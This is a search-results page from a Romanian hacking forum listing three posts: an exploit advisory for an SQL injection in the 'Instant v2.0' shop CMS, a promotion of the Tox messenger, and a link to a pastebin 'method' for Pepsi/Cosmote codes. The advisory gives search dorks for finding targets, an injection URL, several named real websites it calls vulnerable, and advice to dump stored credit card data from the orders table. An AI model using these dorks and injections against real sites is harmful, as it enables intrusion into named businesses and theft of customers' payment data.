Jump to content

Search the Community

Showing results for tags 'instant'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 3 results

  1. ========================================================================================== Instant v2.0 SQL Injection Vulnerability ========================================================================================== :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Instant v2.0 SQL Injection Vulnerability : # Date : 10th March 2015 : # Author : X-Cisadane : # CMS Name : Instant v2.0 (another OverCoffee production) : # CMS Developer : overcoffee.com : # Version : 2.0 : # Category : Web Applications : # Vulnerability : SQL Injection : # Tested On : Google Chrome Version 40.0.2214.115 m (Windows 7), Havij 1.16 Pro & SQLMap 1.0-dev-nongit-20150125 : # Greetz to : Explore Crew, CodeNesia, Bogor Hackers Community, Ngobas and Winda Utari :-------------------------------------------------------------------------------------------------------------------------: A SQL Injection Vulnerability has been discovered in the Instant v.2.0 CMS. The Vulnerability is located in the subid Value of the product_cat.php File. Attackers are able to execute own SQL commands by usage of a GET Method Request with manipulated subid Value. Attackers are able to read Database information by execution of own SQL commands. DORKS (How to find the target) : ================================ "Powered By Instant" inurl:/catalog/ inurl:/product_cat.php?subid= Or use your own Google Dorks Proof of Concept ================ SQL Injection PoC : http://[Site]/[Path]/product_cat.php/subid=['SQLi] And you have to change the URL structure to http://[Site]/[Path]/product_cat.php?subid=['SQLi] Example : http://www.cynthiawebbdesigns.com/catalog/product_cat.php/subid=16617/index.html?PHPSESSID=3ef7e156add41316201ffe87bd489a7d Just change the URL structure to http://www.cynthiawebbdesigns.com/catalog/product_cat.php?subid='16617 And you'll see this error notice : You have an error in your SQL syntax; check the manual that corresponds to your MySQL ... Note : This CMS stored Credit Card Infos on the Database, just open your Fav Tool and Dump the orders Table PIC / PoC : http://i59.tinypic.com/4l0poh.png Another Vuln Sites : http://www.unitymarketingonline.com/catalog/product_cat.php?subid=['SQLi] http://www.peacefulinspirations.net/catalog/product_cat.php?subid=['SQLi] http://www.dickensgifts.com/catalog/product_cat.php?subid=['SQLi] http://www.frogandprincellc.com/catalog/product_cat.php?subid=['SQLi] http://www.debrekht.com/catalog/product_cat.php?subid=['SQLi] ... etc ... Source
  2. A New Kind of Instant Messaging With the rise of government monitoring programs, Tox provides an easy to use application that allows you to connect with friends and family without anyone else listening in. While other big-name services require you to pay for features, Tox is totally free, and comes without advertising. Instant messaging, video conferencing, and more Messages At your fingertips. You're always in the loop with instant encrypted messaging. Calls Stay in touch. Make free and secure Tox to Tox calls. Video Seeing is believing. Catch up face to face with a secure video call. Security Tox takes your privacy seriously. With leading-class encryption, you can rest assured knowing that the only people reading your messages are the ones you send them to. Download and more infos: https://tox.im/en https://wiki.tox.im
  3. Link : PEPSI COD INSTANT - COSMOTE - Pastebin.com DACA DORITI SA DESCARCATI ACEASTA METODA AVETI INFORMATII IN LINKUL DE SUS. PS: Descarcarea acestei metode este GRATUITA. Daca am gresit ceva va rog sa trimiteti topicul la cos si imi cer scuze. Am facut acest sistem de download deoarece vad din ce in ce mai multe suferinte care iau codurile postate gratuit si nici mersi nu dau.
×
×
  • Create New...